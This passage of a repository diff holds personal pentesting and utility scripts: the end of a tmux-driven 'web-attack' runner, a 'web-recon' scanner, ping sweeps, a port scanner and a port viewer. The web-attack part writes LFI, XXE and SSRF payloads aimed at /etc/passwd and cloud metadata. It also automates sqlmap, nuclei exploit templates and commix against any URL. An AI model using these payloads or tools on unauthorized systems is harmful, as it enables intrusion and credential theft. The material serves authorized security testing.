            tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 6 && echo -e '${GREENSTAR} Nuclei: Running exploit templates (authenticated)...${NC}' && nuclei -u '$url' -s critical,high -rl 10 -c 5 -H 'Authorization: Bearer \$AUTH_TOKEN' -t ~/nuclei-templates/exposures/ -t ~/nuclei-templates/vulnerabilities/ -t ~/nuclei-templates/cves/ -o nuclei-exploits.txt 2>&1 | tee nuclei.log && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
        else
            tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 6 && echo -e '${GREENSTAR} Nuclei: Running exploit templates...${NC}' && nuclei -u '$url' -s critical,high -rl 10 -c 5 -t ~/nuclei-templates/exposures/ -t ~/nuclei-templates/vulnerabilities/ -t ~/nuclei-templates/cves/ -o nuclei-exploits.txt 2>&1 | tee nuclei.log && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
        fi
    else
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ nuclei not installed - skipping${NC}'" C-m
    fi

    # Pane 6 (bottom-right): Manual LFI/XXE/SSRF testing
    tmux select-pane -t 6
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Manual vulnerability testing...${NC}' && echo 'Testing LFI/XXE/SSRF vectors...' && echo '# LFI Tests' > manual-tests.txt && echo '$url?file=../../../../etc/passwd' >> manual-tests.txt && echo '$url?page=....//....//etc/passwd' >> manual-tests.txt && echo '# XXE Test' >> manual-tests.txt && echo '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>' >> manual-tests.txt && echo '# SSRF Test' >> manual-tests.txt && echo '$url?url=http://169.254.169.254/latest/meta-data/' >> manual-tests.txt && cat manual-tests.txt && echo -e '${CYAN}[*] Manual tests prepared. Review and execute as needed.${NC}'" C-m

    # Focus back on sqlmap pane
    tmux select-pane -t 1

    echo
    echo -e "${GREEN}✓${NC} Tmux web-attack window created"
    echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> ATTACK: ${url:0:15}... <--${NC}"
    echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
    echo
    echo -e "${YELLOW}Rate Limiting:${NC} Tools staggered and rate-limited to prevent target crash"
    echo -e "${YELLOW}Target Safety:${NC} 500ms-1s delays, reduced threads, max 10 req/sec"
    echo -e "${YELLOW}Note:${NC} Review results carefully - automated tools have false positives"
}
|
||||
|
||||
# Sequential execution (when not in tmux)
#######################################
# Run the attack tools one after another in the current terminal.
# Globals:   OUTPUT_DIR (read); GREENSTAR/GREEN/BOLD/NC (read)
# Arguments: $1 - target URL
#######################################
run_attacks_sequential() {
    local url="$1"

    # Subshell keeps the caller's working directory intact even when a tool
    # aborts (the original bare `cd ..` could be skipped under set -e).
    (
        cd "$OUTPUT_DIR" || exit 1

        # BUG FIX: `command -v X && X … || echo "X not installed"` printed
        # the "not installed" message whenever the tool merely exited
        # non-zero; explicit if/else keeps the message accurate while still
        # continuing past tool failures.
        echo -e "\n${GREENSTAR} Running SQLMap...${NC}"
        if command -v sqlmap &>/dev/null; then
            sqlmap -u "$url" --batch --crawl=2 --level=2 --risk=2 -o --output-dir=sqlmap || true
        else
            echo "sqlmap not installed"
        fi

        echo -e "\n${GREENSTAR} Running Dalfox...${NC}"
        if command -v dalfox &>/dev/null; then
            dalfox url "$url" --deep-domxss -o dalfox.txt || true
        else
            echo "dalfox not installed"
        fi

        echo -e "\n${GREENSTAR} Running Nuclei exploits...${NC}"
        if command -v nuclei &>/dev/null; then
            nuclei -u "$url" -s critical,high -o nuclei-exploits.txt || true
        else
            echo "nuclei not installed"
        fi

        echo -e "\n${GREENSTAR} Running Commix...${NC}"
        if command -v commix &>/dev/null; then
            timeout 120 commix -u "$url" --batch --output-dir=commix || echo "commix timeout or no vulns"
        else
            echo "commix not installed"
        fi
    )

    echo -e "\n${GREEN}✓${NC} Web attack complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||
|
||||
# Parse arguments
# With no arguments or an explicit help flag, print usage and stop.
if (( $# == 0 )); then
    show_help
    exit 0
fi
case "$1" in
    -h|--help|help)
        show_help
        exit 0
        ;;
esac

url="$1"

# Validate URL (guards against an explicitly empty argument)
if [[ -z "$url" ]]; then
    echo -e "${RED}Error:${NC} URL required"
    echo "Usage: web-attack <url>"
    exit 1
fi

# Check tools
check_tools

# Run web attacks
run_web_attack "$url"
|
||||
265
scripts/pentesting/web-recon
Executable file
265
scripts/pentesting/web-recon
Executable file
|
|
@ -0,0 +1,265 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: web-recon (extension dropped when the script moved to scripts/pentesting/)
# Description: Web application reconnaissance with tmux orchestration
# Usage: web-recon <url>
# Creates tmux window with parallel web scans (nuclei, feroxbuster, katana, arjun)

# Script version; readonly for consistency with the constants below.
readonly VERSION="2.0.0"

# Colors (ANSI escape sequences, rendered via `echo -e`)
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'

# Status indicators used as message prefixes throughout the script
readonly GREENPLUS="${GREEN}[+]${NC}"
readonly GREENSTAR="${YELLOW}[*]${NC}"
readonly REDMINUS="${RED}[-]${NC}"
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||
|
||||
# Print usage, the pane layout, examples, and the scan workflow to stdout.
# Formatting codes come from the readonly color globals defined at the top
# of the script.
show_help() {
    echo -e "${BOLD}web-recon${NC} - Web Application Reconnaissance v${VERSION}"
    echo
    echo -e "${BOLD}USAGE:${NC}"
    echo "  web-recon <url>"
    echo
    echo -e "${BOLD}DESCRIPTION:${NC}"
    echo "  Creates tmux window with 4 panes running parallel/pipelined web reconnaissance:"
    echo "  - Pane 1 (top-left): nuclei (vulnerability scanner)"
    echo "  - Pane 2 (top-right): feroxbuster → arjun (pipeline)"
    echo "  - Pane 3 (bottom-left): katana (web crawler with JS parsing)"
    echo "  - Pane 4 (bottom-right): live results dashboard"
    echo
    echo -e "${BOLD}EXAMPLES:${NC}"
    echo "  web-recon http://target.htb"
    echo "  web-recon https://example.com"
    echo "  web-recon 10.10.10.5"
    echo
    echo -e "${BOLD}OUTPUT:${NC}"
    echo "  All results saved to: ./web-recon-<target>-<timestamp>/"
    echo
    echo -e "${BOLD}WORKFLOW:${NC}"
    echo "  - Nuclei & Katana: Run in parallel immediately"
    echo "  - Feroxbuster (5 min) → Arjun: Pipeline (arjun waits for feroxbuster)"
    echo "  - httpx: Live monitoring - probes URLs as they're discovered"
}
|
||||
|
||||
# Check required tools
# tmux is a hard requirement; the web tools are optional — missing ones only
# cause their scans to be skipped, with install hints printed.
check_tools() {
    local missing=()
    local optional_missing=()
    local tool

    # Core tools
    if ! command -v tmux &>/dev/null; then
        missing+=("tmux")
    fi

    # Web tools (all optional but warn) — order preserved for output
    for tool in nuclei feroxbuster katana arjun; do
        if ! command -v "$tool" &>/dev/null; then
            optional_missing+=("$tool")
        fi
    done

    if (( ${#missing[@]} > 0 )); then
        echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
        exit 1
    fi

    if (( ${#optional_missing[@]} > 0 )); then
        echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${optional_missing[*]}"
        echo -e "${CYAN}Install with:${NC}"
        for tool in "${optional_missing[@]}"; do
            case "$tool" in
                nuclei) echo "  go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" ;;
                feroxbuster) echo "  cargo install feroxbuster (or: sudo apt install feroxbuster)" ;;
                katana) echo "  go install github.com/projectdiscovery/katana/cmd/katana@latest" ;;
                arjun) echo "  pipx install arjun" ;;
            esac
        done
        echo
    fi
}
|
||||
|
||||
# Create output directory
# Build a timestamped results directory name from the target URL and create
# it, publishing the name via the OUTPUT_DIR global.
setup_output_dir() {
    local url="$1"
    local timestamp clean_url
    timestamp=$(date +%Y%m%d-%H%M%S)
    # '/' and ':' become '_'; the characters h/t/p are stripped entirely
    # (same transform web-attack uses to find these directories later)
    clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')

    OUTPUT_DIR="web-recon-${clean_url}-${timestamp}"
    mkdir -p "$OUTPUT_DIR"

    echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||
|
||||
# Main web-recon function
#######################################
# Drive the recon run: normalize the URL, create the output directory, and
# launch nuclei / feroxbuster→arjun / katana plus a live dashboard in four
# tmux panes (or run the scans sequentially when not inside tmux).
# Globals:   OUTPUT_DIR (read, set by setup_output_dir); WINDOW_NAME (written);
#            color constants (read)
# Arguments: $1 - target URL (scheme optional; http:// is assumed)
#######################################
run_web_recon() {
    local url="$1"

    # Ensure URL has http:// or https://
    if [[ ! "$url" =~ ^https?:// ]]; then
        url="http://$url"
        echo -e "${YELLOW}⚠${NC} No protocol specified, using: $url"
    fi

    echo -e "${CYAN}${BOLD}"
    echo "╔════════════════════════════════════════════════════════════╗"
    echo "║ Web Application Reconnaissance ║"
    echo "║ Target: $url"
    echo "╚════════════════════════════════════════════════════════════╝"
    echo -e "${NC}"

    # Create output directory
    setup_output_dir "$url"

    # Check if in tmux
    if [[ -z "${TMUX:-}" ]]; then
        echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
        run_scans_sequential "$url"
        return
    fi

    # Create tmux window
    WINDOW_NAME="--> Web: ${url:0:20}... <--"
    tmux new-window -n "$WINDOW_NAME"

    # Split into 4 panes with explicit targeting
    # Layout: 2x2 grid with pipelines and live monitoring
    # ACTUAL pane numbers after splits: 1, 2, 3, 4 (no pane 0!)
    # [1: nuclei] [2: feroxbuster → arjun]
    # [3: katana] [4: live dashboard]

    # Create 2x2 grid layout
    # CRITICAL: Tmux pane numbering behavior discovered through testing:
    # Step 1: split-window -h creates [0:left] [1:right]
    # Step 2: select pane 0, split-window -v creates [0:TL] [1:BL] [2:right]
    # Step 3: select pane 2, split-window -v creates [1:TL] [2:TR] [3:BL] [4:BR]
    #
    # PANE 0 DISAPPEARS during this process! Final panes are numbered 1, 2, 3, 4

    # Split horizontally first (left | right)
    tmux split-window -h

    # Split left column vertically
    tmux select-pane -t 0
    tmux split-window -v

    # Split right column vertically (target pane 2 after left split)
    tmux select-pane -t 2
    tmux split-window -v

    # Force tiled layout for perfect 2x2 grid (equal-sized panes)
    tmux select-layout tiled

    # Final verified pane layout after tmux renumbering and tiled layout:
    # 1 (top-left)    2 (top-right)
    # 3 (bottom-left) 4 (bottom-right)

    # Send commands to each pane with ACTUAL pane numbers after splits
    # After all splits complete, tmux renumbers panes as: 1 (TL), 2 (TR), 3 (BL), 4 (BR)
    # (pane 0 disappears during the splitting process)

    # Pane 1 (top-left): nuclei
    tmux select-pane -t 1
    if command -v nuclei &>/dev/null; then
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting nuclei vulnerability scan...${NC}' && nuclei -u '$url' -o nuclei.txt && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
    else
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ nuclei not installed - skipping${NC}'" C-m
    fi

    # Pane 2 (top-right): feroxbuster THEN arjun (pipeline)
    tmux select-pane -t 2
    if command -v feroxbuster &>/dev/null; then
        # Run feroxbuster, then arjun on discovered URLs
        if command -v arjun &>/dev/null; then
            tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting feroxbuster (5 min limit, default wordlist)...${NC}' && echo -e '${YELLOW}💡 Tip: Install SecLists for better wordlists: sudo apt install seclists${NC}' && timeout 300 feroxbuster -u '$url' -d 3 --force-recursion -C 404 -o feroxbuster.txt 2>&1 | tee feroxbuster-stderr.log || echo 'Feroxbuster exited' && echo -e '${GREEN}✓ Feroxbuster complete${NC}' && cat feroxbuster.txt 2>/dev/null | grep -oE 'http[s]?://[^[:space:]]+' >> urls.txt || true && echo -e '${GREENSTAR} Starting arjun parameter discovery...${NC}' && arjun -u '$url' -oT arjun_main.txt 2>&1 | tee arjun.log && if [ -f urls.txt ] && [ -s urls.txt ]; then echo -e '${GREENSTAR} Running arjun on discovered URLs...${NC}' && arjun -i urls.txt -oT arjun_urls.txt 2>&1 | tee -a arjun.log || true; fi && echo -e '${GREEN}✓ Arjun complete${NC}'" C-m
        else
            tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting feroxbuster (5 min limit, default wordlist)...${NC}' && echo -e '${YELLOW}💡 Tip: Install SecLists for better wordlists: sudo apt install seclists${NC}' && timeout 300 feroxbuster -u '$url' -d 3 --force-recursion -C 404 -o feroxbuster.txt 2>&1 | tee feroxbuster-stderr.log || echo 'Feroxbuster exited' && echo -e '${GREEN}✓ Feroxbuster complete${NC}' && cat feroxbuster.txt 2>/dev/null | grep -oE 'http[s]?://[^[:space:]]+' >> urls.txt || true" C-m
        fi
    else
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ feroxbuster not installed - skipping${NC}' && touch urls.txt" C-m
    fi

    # Pane 3 (bottom-left): katana (web crawler with all output formats)
    tmux select-pane -t 3
    if command -v katana &>/dev/null; then
        # Full katana with all output formats as originally requested
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting katana crawler (full output)...${NC}' && katana -u '$url' -jc -kf all -aff -d 10 -o katana.txt 2>&1 | tee katana.log && katana -u '$url' -jc -kf all -aff -d 10 -f path -o katana_paths.txt && katana -u '$url' -jc -kf all -aff -d 10 -f url -o katana_urls.txt && katana -u '$url' -jc -kf all -aff -d 10 -f udir -o katana_dirs.txt && cat katana_dirs.txt 2>/dev/null | sort -u >> urls.txt && cat katana_paths.txt 2>/dev/null | sed 's/^.//g' >> paths.txt && echo -e '${GREEN}✓ Katana complete (all formats)${NC}'" C-m
    else
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ katana not installed - skipping${NC}'" C-m
    fi

    # Pane 4 (bottom-right): Live results dashboard
    tmux select-pane -t 4
    # Watch output files and show live statistics
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${CYAN}╔══════════════════════════════════════════════╗${NC}' && echo -e '${CYAN}║ LIVE SCAN RESULTS DASHBOARD ║${NC}' && echo -e '${CYAN}╚══════════════════════════════════════════════╝${NC}' && echo -e '${YELLOW}[*] Monitoring output files...${NC}' && while true; do clear; echo -e '${CYAN}═══ Scan Progress ═══${NC}'; echo; echo -e '${GREEN}Nuclei:${NC}'; [ -f nuclei.txt ] && [ -s nuclei.txt ] && echo \" Found: \$(wc -l < nuclei.txt 2>/dev/null || echo 0) findings\" || echo ' Waiting...'; echo; echo -e '${GREEN}Feroxbuster:${NC}'; [ -f feroxbuster.txt ] && [ -s feroxbuster.txt ] && echo \" Found: \$(wc -l < feroxbuster.txt 2>/dev/null || echo 0) endpoints\" || echo ' Waiting...'; echo; echo -e '${GREEN}Katana:${NC}'; [ -f katana.txt ] && [ -s katana.txt ] && echo \" Crawled: \$(wc -l < katana.txt 2>/dev/null || echo 0) URLs\" || echo ' Waiting...'; echo; echo -e '${GREEN}Arjun:${NC}'; [ -f arjun_main.txt ] && [ -s arjun_main.txt ] && echo \" Found: \$(wc -l < arjun_main.txt 2>/dev/null || echo 0) parameters\" || [ -f arjun.log ] && grep -q 'complete' arjun.log 2>/dev/null && echo ' Complete (0 parameters)' || echo ' Waiting...'; echo; echo -e '${GREEN}URLs Discovered:${NC}'; [ -f urls.txt ] && [ -s urls.txt ] && echo \" Total: \$(sort -u urls.txt 2>/dev/null | wc -l) unique URLs\" && echo && echo -e '${CYAN}Latest URLs:${NC}' && tail -5 urls.txt 2>/dev/null || echo ' None yet'; echo; echo -e '${YELLOW}[Press Ctrl+C to stop monitoring]${NC}'; sleep 3; done" C-m

    # Focus back on top-left pane (nuclei)
    tmux select-pane -t 1

    echo
    echo -e "${GREEN}✓${NC} Tmux web-recon window created"
    echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> Web: ${url:0:20}... <--${NC}"
    echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
    echo
    echo -e "${YELLOW}Note:${NC} Feroxbuster will auto-stop after 5 minutes"
    echo -e "${YELLOW}Note:${NC} Arjun waits 10 seconds before starting"
}
|
||||
|
||||
# Sequential execution (when not in tmux)
#######################################
# Run the web-recon scans one after another in the current terminal.
# Globals:   OUTPUT_DIR (read); GREENSTAR/GREEN/BOLD/NC (read)
# Arguments: $1 - target URL
#######################################
run_scans_sequential() {
    local url="$1"

    # Subshell keeps the caller's working directory intact even when a tool
    # aborts (the original bare `cd ..` could be skipped under set -e).
    (
        cd "$OUTPUT_DIR" || exit 1

        # BUG FIX: `command -v nuclei && nuclei … || echo "not installed"`
        # printed "not installed" whenever nuclei merely exited non-zero;
        # explicit if/else keeps the message accurate.
        echo -e "\n${GREENSTAR} Running nuclei...${NC}"
        if command -v nuclei &>/dev/null; then
            nuclei -u "$url" -o nuclei.txt || true
        else
            echo "nuclei not installed"
        fi

        echo -e "\n${GREENSTAR} Running feroxbuster (5 min timeout)...${NC}"
        if command -v feroxbuster &>/dev/null; then
            timeout 300 feroxbuster -u "$url" -d 3 --smart --silent --force-recursion -o feroxbuster.txt 2>/dev/null || true
            # first column of each result line is the discovered URL
            if [[ -f feroxbuster.txt ]]; then
                awk '{print $1}' feroxbuster.txt >> urls.txt
            fi
        fi

        echo -e "\n${GREENSTAR} Running katana...${NC}"
        if command -v katana &>/dev/null; then
            katana -u "$url" -jc -kf all -aff -d 10 -o katana.txt
            if [[ -f katana.txt ]]; then
                sort -u katana.txt >> urls.txt
            fi
        fi

        echo -e "\n${GREENSTAR} Running arjun...${NC}"
        if command -v arjun &>/dev/null; then
            arjun -u "$url" -oT arjun_main.txt 2>&1 | tee arjun.log
            # second pass over every URL discovered by the scans above
            [ -f urls.txt ] && [ -s urls.txt ] && arjun -i urls.txt -oT arjun_urls.txt 2>&1 | tee -a arjun.log || true
        fi
    )

    echo -e "\n${GREEN}✓${NC} Web recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||
|
||||
# Parse arguments
# With no arguments or an explicit help flag, print usage and stop.
if (( $# == 0 )); then
    show_help
    exit 0
fi
case "$1" in
    -h|--help|help)
        show_help
        exit 0
        ;;
esac

url="$1"

# Validate URL (guards against an explicitly empty argument)
if [[ -z "$url" ]]; then
    echo -e "${RED}Error:${NC} URL required"
    echo "Usage: web-recon <url>"
    exit 1
fi

# Check tools
check_tools

# Run web reconnaissance
run_web_recon "$url"
|
||||
43
scripts/ping-sweep.py
Normal file
43
scripts/ping-sweep.py
Normal file
|
|
@ -0,0 +1,43 @@
|
|||
#!/usr/bin/python3
"""Ping sweep a /24 network and report which hosts answer ICMP echo."""

import sys
import subprocess


def ping_sweep(network_prefix):
    """Ping every host <network_prefix>.1 .. <network_prefix>.253.

    Args:
        network_prefix: first three octets of the network, e.g. '192.168.1'.

    Returns:
        List of IP address strings that answered a single ping within 1s.
    """
    live_hosts = []

    for i in range(1, 254):
        ip = f'{network_prefix}.{i}'
        # flush so progress is visible immediately even when stdout is piped
        print(f'Pinging {ip}...', end='', flush=True)
        result = subprocess.run(
            ['ping', '-c', '1', '-W', '1', ip],
            stdout=subprocess.DEVNULL,
            # FIX: also silence stderr — ping's own error text (e.g. for
            # unreachable networks) otherwise interleaves with our output
            stderr=subprocess.DEVNULL,
        )
        if result.returncode == 0:
            print('Host is up')
            live_hosts.append(ip)
        else:
            print('No response')

    return live_hosts

# Usage
# hosts = ping_sweep('192.168.1')
# print('\nLive hosts:')
# print('\n'.join(hosts))


# Entry point
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 pingsweep.py <network_prefix>")
        print("Example: python3 pingsweep.py 192.168.1")
        sys.exit(1)

    prefix = sys.argv[1]
    hosts = ping_sweep(prefix)

    print("\nLive hosts:")
    for host in hosts:
        print(host)
|
||||
9
scripts/ping-sweep.sh
Normal file
9
scripts/ping-sweep.sh
Normal file
|
|
@ -0,0 +1,9 @@
|
|||
#!/bin/bash
# ping-sweep.sh - Discover live hosts on a /24 network via ICMP.
#
# Usage: ping-sweep.sh [network_prefix]
#   network_prefix defaults to 192.168.1 (the original hard-coded value).
# Prints the IP of every host that answers a single 1-second ping.

# Generalized: the prefix used to be hard-coded; default keeps old behavior.
prefix="${1:-192.168.1}"

echo "Scanning..."
for ip in $(seq 1 255); do
    # grep keeps only successful replies; awk/tr extract the bare address.
    ping -c 1 -W 1 "$prefix.$ip" | grep "64 bytes" | awk '{print $4}' | tr -d ':'
done
|
||||
|
||||
19
scripts/pix
Executable file
19
scripts/pix
Executable file
|
|
@ -0,0 +1,19 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: pix
# Description: View images in terminal with mpv
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: pix image.jpg
#        pix *.png
#        pix ~/Pictures/

# Bail out early when mpv is unavailable.
command -v mpv &>/dev/null || {
    echo "Error: mpv not found. Install with: sudo apt install mpv" >&2
    exit 1
}

# Hand the process over to mpv: show each image until the user advances.
exec mpv \
    --image-display-duration=inf \
    --loop-file=inf \
    "$@"
|
||||
55
scripts/port-scanner.py
Executable file
55
scripts/port-scanner.py
Executable file
|
|
@ -0,0 +1,55 @@
|
|||
#!/usr/bin/python3
"""Simple TCP connect() port scanner (freeCodeCamp-style API)."""

import socket
import re

# common_ports is an optional local module mapping port -> service name.
# FIX: the original imported it unconditionally at the top, which made the
# ImportError fallback inside get_open_ports unreachable and crashed the
# whole script on import when the module was absent.
try:
    import common_ports
except ImportError:
    common_ports = None


def get_open_ports(target, port_range, verbose=False):
    """Scan TCP ports on `target` within the inclusive range [lo, hi].

    Args:
        target: hostname or dotted-quad IP address.
        port_range: two-element sequence [first_port, last_port].
        verbose: when True, return a formatted report string instead of a list.

    Returns:
        List of open port numbers, or (verbose) a report string, or an
        error string when the target cannot be resolved:
        'Error: Invalid IP address' for dotted-quad-looking targets,
        'Error: Invalid hostname' otherwise.
    """
    open_ports = []

    # Try resolving the target
    try:
        ip_addr = socket.gethostbyname(target)
    except socket.gaierror:
        if re.match(r'^\d{1,3}(\.\d{1,3}){3}$', target):
            return "Error: Invalid IP address"
        return "Error: Invalid hostname"

    for port in range(port_range[0], port_range[1] + 1):
        try:
            # Context manager guarantees the socket is closed even when
            # connect_ex raises (the original leaked the fd in that case).
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(1)
                if s.connect_ex((ip_addr, port)) == 0:
                    open_ports.append(port)
        except OSError:
            # Narrowed from a bare except: only swallow socket-level errors.
            continue

    # Output
    if verbose:
        try:
            hostname = socket.gethostbyaddr(ip_addr)[0]
        except socket.herror:
            hostname = target

        output = f"Open ports for {hostname} ({ip_addr})\nPORT SERVICE\n"
        for port in open_ports:
            if common_ports is not None:
                service = common_ports.ports_and_services.get(port, 'unknown')
            else:
                service = 'unknown'
            output += f"{port:<9}{service}\n"
        return output.strip()

    return open_ports


if __name__ == "__main__":
    # Demo scan; guarded so importing this module no longer hits the network.
    print(get_open_ports("scanme.nmap.org", [20, 80], verbose=True))
|
||||
226
scripts/ports
Executable file
226
scripts/ports
Executable file
|
|
@ -0,0 +1,226 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: ports
# Description: Enhanced port viewer with colors, filtering, and process info
# Usage: ports # Show all ports (colorized)
# ports -l # Listening only (most common)
# ports -p # Show process names
# ports 80 # Find what's on port 80
# ports tcp # TCP only
# ports udp # UDP only

VERSION="1.0.0"

# ANSI color palette used throughout the script.
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly RED='\033[0;31m'
readonly CYAN='\033[0;36m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'

# Usage screen. printf %b interprets the embedded ANSI escapes,
# producing the same bytes the original echo -e calls emitted.
show_help() {
    printf '%b\n' "\033[1mports\033[0m - Enhanced Port Viewer v${VERSION}"
    printf '\n'
    printf '%b\n' "\033[1mUSAGE:\033[0m"
    printf '%s\n' " ports [OPTIONS] [PORT|PROTOCOL]"
    printf '\n'
    printf '%b\n' "\033[1mOPTIONS:\033[0m"
    printf '%b\n' " \033[0;36m-l, --listen\033[0m Show listening ports only (default)"
    printf '%b\n' " \033[0;36m-a, --all\033[0m Show all connections"
    printf '%b\n' " \033[0;36m-p, --process\033[0m Show process names/PIDs"
    printf '%b\n' " \033[0;36m-n, --numeric\033[0m Don't resolve hostnames"
    printf '%b\n' " \033[0;36m-h, --help\033[0m Show this help message"
    printf '\n'
    printf '%b\n' "\033[1mFILTERS:\033[0m"
    printf '%s\n' " ports 80 # Show what's on port 80"
    printf '%s\n' " ports tcp # TCP connections only"
    printf '%s\n' " ports udp # UDP connections only"
    printf '%s\n' " ports 8000-9000 # Port range"
    printf '\n'
    printf '%b\n' "\033[1mEXAMPLES:\033[0m"
    printf '%s\n' " ports # Listening ports (colorized)"
    printf '%s\n' " ports -p # With process info"
    printf '%s\n' " ports -a # All connections"
    printf '%s\n' " ports 443 # What's on HTTPS port"
    printf '%s\n' " ports tcp -p # TCP with processes"
    printf '\n'
    printf '%b\n' "\033[1mCOLOR LEGEND:\033[0m"
    printf '%b\n' " \033[0;32mLISTEN\033[0m - Listening for connections"
    printf '%b\n' " \033[0;34mESTABLISHED\033[0m - Active connection"
    printf '%b\n' " \033[1;33mTIME_WAIT\033[0m - Connection closing"
    printf '%b\n' " \033[0;31mCLOSE_WAIT\033[0m - Waiting to close"
}
|
||||
|
||||
# Colorize state
|
||||
colorize_state() {
    # Wrap a socket state name in the color conventionally used for it;
    # unknown states pass through unchanged.
    local state=$1
    local color=""
    case "$state" in
        LISTEN)               color="$GREEN" ;;
        ESTABLISHED)          color="$BLUE" ;;
        TIME_WAIT|CLOSE_WAIT) color="$YELLOW" ;;
        SYN_SENT|SYN_RECV)    color="$CYAN" ;;
    esac
    if [[ -n "$color" ]]; then
        echo -e "${color}${state}${NC}"
    else
        echo "$state"
    fi
}
|
||||
|
||||
# Check if port is "interesting" (not in common_ports)
|
||||
is_unusual_port() {
    # Return 0 ("unusual") unless the port is a well-known service port,
    # in which case return 1. Same port list as the original array.
    local port=$1
    case " 20 21 22 23 25 53 80 110 143 443 465 587 993 995 3306 5432 6379 8080 8443 " in
        *" $port "*) return 1 ;;
    esac
    return 0
}
|
||||
|
||||
# Parse arguments
|
||||
# ---- argument parsing -------------------------------------------------
show_listen_only=true
show_process=false
numeric=true   # ss is always invoked with -n; flag kept for CLI compat
filter_proto=""
filter_port=""

while [[ $# -gt 0 ]]; do
    case $1 in
        -l|--listen)
            show_listen_only=true
            shift
            ;;
        -a|--all)
            show_listen_only=false
            shift
            ;;
        -p|--process)
            show_process=true
            shift
            ;;
        -n|--numeric)
            numeric=true
            shift
            ;;
        -h|--help)
            show_help
            exit 0
            ;;
        tcp|TCP)
            filter_proto="tcp"
            shift
            ;;
        udp|UDP)
            filter_proto="udp"
            shift
            ;;
        [0-9]*)
            # Single port ("80") or inclusive range ("8000-9000").
            filter_port="$1"
            shift
            ;;
        *)
            echo -e "${RED}Error:${NC} Unknown option: $1" >&2
            echo "Run 'ports --help' for usage information" >&2
            exit 1
            ;;
    esac
done

# ---- build the ss command ---------------------------------------------
ss_cmd="ss -tuln"

if [[ "$show_listen_only" == "false" ]]; then
    ss_cmd="ss -tun"
fi

if [[ "$show_process" == "true" ]]; then
    ss_cmd="sudo ss -tulnp"
    if [[ "$show_listen_only" == "false" ]]; then
        ss_cmd="sudo ss -tunp"
    fi
fi

# Execute and format ($ss_cmd is intentionally word-split).
output=$($ss_cmd)

# Header
echo -e "${BOLD}${CYAN}Active Ports${NC}"
echo -e "${BOLD}────────────────────────────────────────────────────────────${NC}"

# Parse, filter and columnize the ss output.
# FIX: port filtering now honors ranges like "8000-9000", which the help
# text always advertised but the old exact-match comparison rejected.
echo "$output" | awk -v show_proc="$show_process" -v filter_proto="$filter_proto" -v filter_port="$filter_port" '
NR==1 { next } # Skip header from ss

{
    proto = $1
    state = $2
    laddr = $5
    peer  = $6
    process = ""

    # Extract process info if available (last field onward)
    if (show_proc == "true" && NF >= 7) {
        for (i=7; i<=NF; i++) {
            process = process $i " "
        }
    }

    # Filter by protocol
    if (filter_proto != "" && tolower(proto) !~ tolower(filter_proto)) next

    # Extract port from local address (last :-separated component)
    split(laddr, parts, ":")
    port = parts[length(parts)]

    # Filter by port: exact match, or inclusive numeric range "lo-hi"
    if (filter_port != "") {
        if (filter_port ~ /-/) {
            split(filter_port, r, "-")
            if (port + 0 < r[1] + 0 || port + 0 > r[2] + 0) next
        } else if (port != filter_port) {
            next
        }
    }

    # Print formatted line
    printf "%-6s %-12s %-25s %-25s", proto, state, laddr, peer

    if (process != "") {
        printf " %s", process
    }

    printf "\n"
}
' | while IFS= read -r line; do
    # Colorize based on connection state
    if [[ "$line" =~ LISTEN ]]; then
        echo -e "$line" | sed "s/LISTEN/${GREEN}LISTEN${NC}/"
    elif [[ "$line" =~ ESTABLISHED ]]; then
        echo -e "$line" | sed "s/ESTABLISHED/${BLUE}ESTABLISHED${NC}/"
    elif [[ "$line" =~ TIME_WAIT ]]; then
        echo -e "$line" | sed "s/TIME_WAIT/${YELLOW}TIME_WAIT${NC}/"
